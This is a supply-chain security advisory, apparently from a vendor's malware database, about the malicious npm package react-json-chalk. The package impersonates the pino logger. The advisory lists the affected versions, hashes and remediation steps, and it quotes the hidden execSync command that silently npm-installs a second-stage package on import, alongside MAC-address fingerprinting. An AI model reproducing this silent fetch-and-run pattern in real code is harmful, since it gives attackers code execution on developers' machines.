Which versions of react-json-chalk are malicious?

The following npm versions of react-json-chalk are flagged malicious: 13.4.4, 13.4.6. Treat any of these as compromised.

How do I remediate react-json-chalk if I installed it?

Remove react-json-chalk from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is react-json-chalk part of a known attack campaign?

Yes — react-json-chalk is associated with the IN-MAL-2026-004875, IN-MAL-2026-005803 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect react-json-chalk in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking react-json-chalk and packages like it before any post-install script runs.

Malicious package

react-json-chalknpm

Malicious code in react-json-chalk (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-4792

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall react-json-chalk

What this malware does

The package is published as react-json-chalk but its main entry (pino.js) impersonates the pino logger (homepage https://getpino.io, bundled pino source tree, misappropriated description). On require('react-json-chalk'), pino.js immediately loads lib/writer.js, which at module top level tries require('react-pinojs') and, if absent, executes child_process.execSync("npm install react-pinojs --no-warnings --no-save --no-progress --loglevel silent") and then require('../../react-pinojs/pino.js'). The flags suppress install output and avoid persisting the dependency in package.json, so consumers get no visible signal that a second package was fetched. The fetched dependency is unpinned, fully controlled by whoever publishes react-pinojs, and its code runs as part of the require() of this package — arbitrary attacker code on the installer's machine on every import. The same lib/writer.js defines getMacAddress() which enumerates non-internal IPv4 interface MAC addresses, consistent with host fingerprinting handed off to the second stage. The package name/contents mismatch (logger source tree under an unrelated name) is also a namespace-abuse / pino-impersonation pattern.

Malicious versions

2 flagged

13.4.413.4.6

Indicators of compromise (SHA-256)

c3411327be0927b7a726464d2bd9a590ff4ca61bc08e9170e4c0e482dc18dac2

1a2b0f9e236c71a3da2c36dd19a90a0a3e096503e79754d25ce2a13eb5d72d77

Frequently asked questions

No. react-json-chalk on npm has been identified as a malicious package (versions 13.4.4, 13.4.6 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-004875IN-MAL-2026-005803

References

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection